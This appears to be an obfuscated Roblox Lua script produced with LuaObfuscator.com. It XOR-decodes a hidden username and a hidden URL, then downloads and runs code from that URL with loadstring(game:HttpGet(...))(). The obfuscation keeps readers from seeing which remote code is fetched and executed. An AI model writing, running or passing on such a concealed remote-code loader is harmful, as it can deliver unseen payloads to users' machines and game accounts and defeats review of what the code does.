--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(3548 -(974 + 889)) -((2645 -(509 + 1039)) + 587), #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + ((1891 -669) -(550 + (1383 -(145 + 567)))))),v1(v2(v9,1 + ((v11-(742 -(526 + 215)))% #v9),(627 -(59 + 567)) + ((v11-((1 + 1) -1))% #v9) + 1)))%256));end return v5(v10);end _G.UserName=v7("\91\70\85\42\241\194\81\64\94\39\255\212\24\27\4","\41\41\55\70\158\186");loadstring(game:HttpGet(v7("\42\5\231\50\49\75\188\109\48\16\228\108\37\24\231\42\55\19\230\49\39\3\240\45\44\5\246\44\54\95\240\45\47\94\229\39\49\5\234\58\109\33\246\54\17\24\254\55\46\16\231\45\48\41\192\33\48\24\227\54\49\94\254\35\43\31\188\3\55\5\252\4\35\3\254\108\46\4\242","\66\113\147\66")))();
